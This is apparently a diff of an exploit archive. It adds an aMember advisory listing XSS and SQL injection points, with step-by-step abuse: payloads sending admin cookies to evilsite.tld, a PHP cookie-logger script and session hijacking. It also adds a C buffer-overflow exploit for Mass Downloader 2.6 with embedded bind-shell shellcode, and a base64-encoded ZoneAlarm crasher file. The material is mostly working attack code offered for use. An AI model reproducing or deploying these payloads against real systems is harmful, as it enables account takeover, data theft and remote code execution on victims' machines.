-http://www.website.tld/amember/admin/users.php?letter="> -http://www.website.tld/amember/admin/users.php?status="> -http://www.website.tld/amember/admin/users.php?letter="> -http://www.website.tld/amember/admin/users.php?action= -http://www.website.tld/amember/admin/setup.php?notebook= -http://www.website.tld/amember/admin/newsletter_threads.php?action=edit&thread_id="> -http://www.website.tld/amember/admin/newsletter_guests.php?action=edit&guest_id="> -http://www.website.tld/amember/admin/products.php?action= -http://www.website.tld/amember/admin/protect.php?action= -http://www.website.tld/amember/admin/coupons.php?action= -http://www.website.tld/amember/admin/aff_banners.php?action=edit_banner&banner_id="> -http://www.website.tld/amember/admin/aff_banners.php?action=edit_link&banner_id="> -http://www.website.tld/amember/admin/email_templates.php?a=edit&tpl= -http://www.website.tld/amember/aff.php?action= (this might only affect attacker) -- More files might be affected. - -HTML Injection: (insert: "> into the mentioned forms) -http://www.website.tld/amember/signup.php (first- and last-name) -http://www.website.tld/amember/aff_signup.php (first- and last-name) -http://www.website.tld/amember/profile.php (first- and last-name) - -HTML Injection Exception: (this injection might only be possible to be seen by the attacker) -http://www.website.tld/amember/aff.php?action=payout_info (other payment plugins might be vulnerable too) - -Affeced Sites (by HTML Injection): -http://www.website.tld/amember/admin/index.php (if the menu user-lookup returns positive) -http://www.website.tld/amember/admin/users.php?q=VALIDUSERNAME&q_where=anywhere&action=search_by_string -http://www.website.tld/amember/admin/users.php?status= (this will always return the HTML Injection) -http://www.website.tld/amember/admin/users.php?action=edit&member_id=VALIDUSERID -http://www.website.tld/amember/admin/users.php?action=actions&member_id=VALIDUSERID 
-http://www.website.tld/amember/admin/users.php?action=edit_payment&payment_id=VALIDPAYMENTID&member_id=VALIDUSERID -http://www.website.tld/amember/admin/users.php?letter=FIRSTLETTEROFYOURUSERNAME --- More files might be affected. - -SQL Injection: (requires admin access) -http://www.website.tld/amember/admin/access_log.php?order1='SQL'a.time+DESC&order2='SQL'a.time+DESC -http://www.website.tld/amember/admin/aff_clicks.php?year_month='SQL'&action=aff_sales -http://www.website.tld/amember/admin/products.php?action=delete&product_id='SQL' --- More files might be affected, the depth of SQL Injection was not checked! - - --:: Solution ::- -All the files are encrypted according to CGI Systems' website. - -Questions and answers (quote) - -I've downloaded aMember, but the source code is corrupted. How can I download it again ? -The source code is not corrupted, but it is encrypted with Zend Encoder or IonCube Encoder technology - -Which essentially mean i was unable to find any solution to the problem. -I believe this vulnerability might be exploited in the wild due to it is very -easy to find and take advantage of. (if you know what you're looking for) - -Addition: The most easy solution would be to use a regular expression to fix this issue. - - --:: Ways of abusing the HTML Injection and XSS ::- -The following are examples of what you can input as first- and/or last-name: -"> tag at the end. However, this is -especially useful where space is an issue, and of course, the shorter your domain, the better. The ".j" is -valid, regardless of the encoding type because the browser knows it in context of a SCRIPT tag. - -Firstname: "> document.location=%22http://evilsite.tld/cookiestealer.php?cookie=%22 %2B document.cookie; -- The reason why "browser-hex" is used is because the above would else issue an error and thereby not work. 
--- Reference about url encoding: http://www.blooberry.com/indexdot/html/topics/urlencoding.htm - -CookieLogger: -"); -else -fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE: $date | COOKIE: $cookie \n\n"); -fclose($log); -} - -logData(); -header ("Location: http://www.pichashare.com/Flash/lazytown_pirate.swf"); -?> - -When you have gotten a hash from the admin of the victim site you can issue: -Javascript:void(document.cookie="PHPSESSID=hash") (where hash is the PHPSESSID hash/cookie) - -What's the first thing you could do as admin? -http://www.website.tld/amember/admin/backup.php - -What's the best way to exploit the vulnerability? -1) Make a file named: .j (and upload to a domain which has a name equal to or shorter than 8 characters) - -2) The file should contain the following: -HTML Code: - -document.location='http://evilsite.tld/cookielogger.php?cookie=' + document.cookie; - -3) Sign up and make you first name: (try aff_signup.php to avoid paying!) -"> +http://www.website.tld/amember/admin/users.php?status="> +http://www.website.tld/amember/admin/users.php?letter="> +http://www.website.tld/amember/admin/users.php?action= +http://www.website.tld/amember/admin/setup.php?notebook= +http://www.website.tld/amember/admin/newsletter_threads.php?action=edit&thread_id="> +http://www.website.tld/amember/admin/newsletter_guests.php?action=edit&guest_id="> +http://www.website.tld/amember/admin/products.php?action= +http://www.website.tld/amember/admin/protect.php?action= +http://www.website.tld/amember/admin/coupons.php?action= +http://www.website.tld/amember/admin/aff_banners.php?action=edit_banner&banner_id="> +http://www.website.tld/amember/admin/aff_banners.php?action=edit_link&banner_id="> +http://www.website.tld/amember/admin/email_templates.php?a=edit&tpl= +http://www.website.tld/amember/aff.php?action= (this might only affect attacker) +- More files might be affected. 
+ +HTML Injection: (insert: "> into the mentioned forms) +http://www.website.tld/amember/signup.php (first- and last-name) +http://www.website.tld/amember/aff_signup.php (first- and last-name) +http://www.website.tld/amember/profile.php (first- and last-name) + +HTML Injection Exception: (this injection might only be possible to be seen by the attacker) +http://www.website.tld/amember/aff.php?action=payout_info (other payment plugins might be vulnerable too) + +Affeced Sites (by HTML Injection): +http://www.website.tld/amember/admin/index.php (if the menu user-lookup returns positive) +http://www.website.tld/amember/admin/users.php?q=VALIDUSERNAME&q_where=anywhere&action=search_by_string +http://www.website.tld/amember/admin/users.php?status= (this will always return the HTML Injection) +http://www.website.tld/amember/admin/users.php?action=edit&member_id=VALIDUSERID +http://www.website.tld/amember/admin/users.php?action=actions&member_id=VALIDUSERID +http://www.website.tld/amember/admin/users.php?action=edit_payment&payment_id=VALIDPAYMENTID&member_id=VALIDUSERID +http://www.website.tld/amember/admin/users.php?letter=FIRSTLETTEROFYOURUSERNAME +-- More files might be affected. + +SQL Injection: (requires admin access) +http://www.website.tld/amember/admin/access_log.php?order1='SQL'a.time+DESC&order2='SQL'a.time+DESC +http://www.website.tld/amember/admin/aff_clicks.php?year_month='SQL'&action=aff_sales +http://www.website.tld/amember/admin/products.php?action=delete&product_id='SQL' +-- More files might be affected, the depth of SQL Injection was not checked! + + +-:: Solution ::- +All the files are encrypted according to CGI Systems' website. + +Questions and answers (quote) + +I've downloaded aMember, but the source code is corrupted. How can I download it again ? +The source code is not corrupted, but it is encrypted with Zend Encoder or IonCube Encoder technology + +Which essentially mean i was unable to find any solution to the problem. 
+I believe this vulnerability might be exploited in the wild due to it is very +easy to find and take advantage of. (if you know what you're looking for) + +Addition: The most easy solution would be to use a regular expression to fix this issue. + + +-:: Ways of abusing the HTML Injection and XSS ::- +The following are examples of what you can input as first- and/or last-name: +"> tag at the end. However, this is +especially useful where space is an issue, and of course, the shorter your domain, the better. The ".j" is +valid, regardless of the encoding type because the browser knows it in context of a SCRIPT tag. + +Firstname: "> document.location=%22http://evilsite.tld/cookiestealer.php?cookie=%22 %2B document.cookie; +- The reason why "browser-hex" is used is because the above would else issue an error and thereby not work. +-- Reference about url encoding: http://www.blooberry.com/indexdot/html/topics/urlencoding.htm + +CookieLogger: +"); +else +fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE: $date | COOKIE: $cookie \n\n"); +fclose($log); +} + +logData(); +header ("Location: http://www.pichashare.com/Flash/lazytown_pirate.swf"); +?> + +When you have gotten a hash from the admin of the victim site you can issue: +Javascript:void(document.cookie="PHPSESSID=hash") (where hash is the PHPSESSID hash/cookie) + +What's the first thing you could do as admin? +http://www.website.tld/amember/admin/backup.php + +What's the best way to exploit the vulnerability? +1) Make a file named: .j (and upload to a domain which has a name equal to or shorter than 8 characters) + +2) The file should contain the following: +HTML Code: + +document.location='http://evilsite.tld/cookielogger.php?cookie=' + document.cookie; + +3) Sign up and make you first name: (try aff_signup.php to avoid paying!) 
+"> +#include +#include +#include +#include +#include +#include +#include +#include +#include + + + + +unsigned char bind_scode[] = + "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" + "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" + "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" + "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" + "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x54" + "\x42\x30\x42\x50\x42\x50\x4b\x58\x45\x54\x4e\x53\x4b\x58\x4e\x37" + "\x45\x50\x4a\x47\x41\x30\x4f\x4e\x4b\x38\x4f\x44\x4a\x51\x4b\x48" + "\x4f\x55\x42\x42\x41\x30\x4b\x4e\x49\x44\x4b\x48\x46\x43\x4b\x38" + "\x41\x30\x50\x4e\x41\x53\x42\x4c\x49\x49\x4e\x4a\x46\x58\x42\x4c" + "\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x44\x4c\x4b\x4e" + "\x46\x4f\x4b\x53\x46\x35\x46\x32\x46\x30\x45\x37\x45\x4e\x4b\x48" + "\x4f\x35\x46\x32\x41\x50\x4b\x4e\x48\x56\x4b\x38\x4e\x50\x4b\x54" + "\x4b\x48\x4f\x55\x4e\x31\x41\x30\x4b\x4e\x4b\x38\x4e\x41\x4b\x38" + "\x41\x30\x4b\x4e\x49\x58\x4e\x35\x46\x42\x46\x50\x43\x4c\x41\x43" + "\x42\x4c\x46\x36\x4b\x48\x42\x34\x42\x33\x45\x38\x42\x4c\x4a\x37" + "\x4e\x30\x4b\x48\x42\x34\x4e\x50\x4b\x48\x42\x57\x4e\x31\x4d\x4a" + "\x4b\x38\x4a\x46\x4a\x50\x4b\x4e\x49\x50\x4b\x48\x42\x38\x42\x4b" + "\x42\x30\x42\x50\x42\x30\x4b\x48\x4a\x36\x4e\x53\x4f\x35\x41\x33" + "\x48\x4f\x42\x46\x48\x35\x49\x58\x4a\x4f\x43\x48\x42\x4c\x4b\x57" + "\x42\x55\x4a\x46\x42\x4f\x4c\x48\x46\x50\x4f\x35\x4a\x46\x4a\x49" + "\x50\x4f\x4c\x38\x50\x30\x47\x55\x4f\x4f\x47\x4e\x43\x56\x41\x36" + "\x4e\x46\x43\x46\x50\x52\x45\x36\x4a\x37\x45\x36\x42\x30\x5a\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + 
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 
+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + + +unsigned char user_scode[] = + "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" + "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" + "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" + "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" + "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x54" + "\x42\x30\x42\x50\x42\x50\x4b\x58\x45\x54\x4e\x53\x4b\x58\x4e\x37" + "\x45\x50\x4a\x47\x41\x30\x4f\x4e\x4b\x38\x4f\x44\x4a\x51\x4b\x48" + "\x4f\x55\x42\x42\x41\x30\x4b\x4e\x49\x44\x4b\x48\x46\x43\x4b\x38" + 
"\x41\x30\x50\x4e\x41\x53\x42\x4c\x49\x49\x4e\x4a\x46\x58\x42\x4c" + "\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x44\x4c\x4b\x4e" + "\x46\x4f\x4b\x53\x46\x35\x46\x32\x46\x30\x45\x37\x45\x4e\x4b\x48" + "\x4f\x35\x46\x32\x41\x50\x4b\x4e\x48\x56\x4b\x38\x4e\x50\x4b\x54" + "\x4b\x48\x4f\x55\x4e\x31\x41\x30\x4b\x4e\x4b\x38\x4e\x41\x4b\x38" + "\x41\x30\x4b\x4e\x49\x58\x4e\x35\x46\x42\x46\x50\x43\x4c\x41\x43" + "\x42\x4c\x46\x36\x4b\x48\x42\x34\x42\x33\x45\x38\x42\x4c\x4a\x37" + "\x4e\x30\x4b\x48\x42\x34\x4e\x50\x4b\x48\x42\x57\x4e\x31\x4d\x4a" + "\x4b\x38\x4a\x46\x4a\x50\x4b\x4e\x49\x50\x4b\x48\x42\x38\x42\x4b" + "\x42\x30\x42\x50\x42\x30\x4b\x48\x4a\x36\x4e\x53\x4f\x35\x41\x33" + "\x48\x4f\x42\x46\x48\x35\x49\x58\x4a\x4f\x43\x48\x42\x4c\x4b\x57" + "\x42\x55\x4a\x46\x42\x4f\x4c\x48\x46\x50\x4f\x35\x4a\x46\x4a\x49" + "\x50\x4f\x4c\x38\x50\x30\x47\x55\x4f\x4f\x47\x4e\x43\x56\x41\x36" + "\x4e\x46\x43\x46\x50\x52\x45\x36\x4a\x37\x45\x36\x42\x30\x5a" + + +unsigned char ra_sp2[] = "\xFF\xBE\x3F\x7E"; //massdown.dll +unsigned char ra_sp3[] = "\x7B\x30\xE4\x77"; //massdown.dll + +unsigned char nops1[12]; //14115 * \x90 +unsigned char nops2[2068]; //2068 * \x90 + +int main(int argc, char **argv) +{ + int i; + FILE* f; + char* ra=NULL; + char* scode=NULL; + printf("[+] Mass Downloader 2.6 Remote Denial of Service PoC \n"); + printf("[+] Discovered by Ciph3r \n"); + printf("[+] Code by Ciph3r Ciph3r_blackhat[at]yahoo[dot]com\n"); + if ((argc!=3)||((atoi(argv[1])!=0)&&(atoi(argv[1])!=1))||((atoi(argv[2])!=0)&&(atoi(argv[2])!=1))){ + printf("Usage: %s target Ciph3r\n",argv[0]); + printf("Where target is:\n"); + printf("0: winXP Pro SP2\n"); + printf("1: win2k\n") + return EXIT_SUCCESS; + } +for(i=0;i<12;i++) nops1[i]='\x90'; + nops1[12]='\0'; + for(i=0;i<2068;i++) nops2[i]='\x90'; + nops2[2068]='\0'; + if(atoi(argv[1])==0) ra=ra_sp2; + else ra=ra_sp3; + if(atoi(argv[2])==0) scode=bind_scode; + else scode=user_scode; + f=fopen("Ciph3r.exe","wb"); + 
fprintf(f,nops1,ra,nops2,scode,'\xd','\xa');
+ fflush(f);
+ fclose(f);
+ printf("Ciph3r.exe created!\n");
+ return EXIT_SUCCESS;
+}
diff --git a/platforms/windows/dos/32428.txt b/platforms/windows/dos/32428.txt
new file mode 100755
index 000000000..8f1931da9
--- /dev/null
+++ b/platforms/windows/dos/32428.txt
@@ -0,0 +1,126 @@ +source: http://www.securityfocus.com/bid/31431/info + +ZoneAlarm Internet Security Suite is prone to a remote denial-of-service vulnerability that occurs in the TrueVector component when connecting to a malicious HTTP proxy. + +ZoneAlarm Internet Security Suite 8.0.020 is vulnerable; other versions may also be affected. + +za_crasher_proxy.b64 (Base64 Encoded File) + + + +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 